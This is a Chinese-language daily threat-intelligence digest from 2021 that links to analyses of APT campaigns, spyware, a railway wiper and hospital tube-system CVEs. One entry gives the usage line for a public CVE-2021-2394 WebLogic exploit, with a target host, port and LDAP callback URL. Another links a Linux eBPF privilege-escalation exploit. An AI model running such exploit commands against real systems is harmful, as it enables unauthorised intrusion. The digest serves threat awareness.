记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

今日威胁情报2021/8/1-2(第379期)

2021-08-02 23:52


高级威胁分析


1、Praying Mantis: An Advanced Memory-Resident Attack


https://www.sygnia.co/praying-mantis-targeted-apt

https://f.hubspotusercontent30.net/hubfs/8776530/TG1021%20-%20Praying%20Mantis%20Threat%20Actor.pdf


2、GhostEmperor APT 使用未知 rootkit 攻击知名受害者


https://usa.kaspersky.com/about/press-releases/2021_ghostemperor-apt-targets-high-profile-victims-using-unknown-rootkit


3、猎天行动——CNC(APT-C-48)组织最新攻击活动披露

CNC(APT-C-48)组织是于2019年新出现的组织,由于其使用的远程控制木马的PDB包含了“cnc_client“的字样,所以将该组织命名为CNC,该组织主要攻击对象为我国军工和教育行业。去年年初我国疫情爆发初期,CNC组织通过伪造疫情相关的文档以及钓鱼网站对医疗行业发起攻击。

近日360高级威胁研究院监测到CNC组织在6月中旬我国航天相关时事热点前后,针对我国科研机构、高等院校以及航天相关领域进行多次情报窃取的定向攻击活动。因此我们将此次攻击活动命名为“猎天行动”。

在本次攻击活动中,CNC组织采用了两种不同的攻击方式进行攻击。

https://mp.weixin.qq.com/s/dMFyLxsErYUZX7BQyBL9YQ


4、阻止 SolarMarker 后门

https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/


5、伊朗铁路被黑导致铁路停摆的技术分析

https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/


6、Bear Tracks:基础设施模式导致发现超过 30 个活跃的 APT29 C2 服务器

https://www.riskiq.com/blog/external-threat-management/apt29-bear-tracks/


7、???“Beijing One Pass” Employee Benefits Software Exhibits Spyware Characteristics???????????????????PC版有后门???

https://www.recordedfuture.com/beijing-one-pass-benefits-software-spyware/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0729.pdf


8、针对 Microsoft IIS 和 SQL Server 的新攻击方法

https://unit42.paloaltonetworks.com/iis-and-sql-server/


技术分享


1、PwnedPiper PTS 安全漏洞威胁着美国 80% 的医院

CVE-2021-37161 – udpRXThread 中的下溢CVE-2021-37162 – sccProcessMsg溢出CVE-2021-37163 – 可通过 Telnet 服务器访问的两个硬编码密码CVE-2021-37164 – tcpTxThread 中的Off-by-3 堆栈溢出CVE-2021-37165 – hmiProcessMsg溢出CVE-2021-37166 – GUI 套接字拒绝服务CVE-2021-37167 – 由 root 运行的用户脚本可用于 PECVE-2021-37160 – 未经身份验证、未加密、未签名的固件升级

https://www.swisslog-healthcare.com/en-us/company/news/2021/07/translogic-firmware-vulnerabilities


2、Fuzzing Windows RPC with RpcView

https://itm4n.github.io/fuzzing-windows-rpc-rpcview/



漏洞相关


1、Microsoft Wont-Fix-List。这些是大杀器。

https://github.com/cfalta/MicrosoftWontFixList/blob/main/README.md


2、CVE-2021-2394

使用方法:
启动一个ldap服务java -jar CVE_2021_2394.jar rhost rport ldapurl例如:java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit

https://github.com/lz2y/CVE-2021-2394


3、Linux_LPE_eBPF_CVE-2021-3490

https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490


网络战与网络情报


1、阿桑奇的近况

https://www.themonthly.com.au/issue/2021/august/1627740000/scott-ludlam/end-game


2、NSO-Pegasus 说明书!!!!!!!产品介绍

https://s3.documentcloud.org/documents/4599753/NSO-Pegasus.pdf





知识来源: https://mp.weixin.qq.com/s?__biz=MzUxMDk3ODEwOA==&mid=2247486792&idx=1&sn=aa5ef8d2df71e589ace294ac2d106ea5

阅读:37657 | 评论:0 | 标签:情报 威胁情报

想收藏或者和大家分享这篇好文章→复制链接地址

“今日威胁情报2021/8/1-2(第379期)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云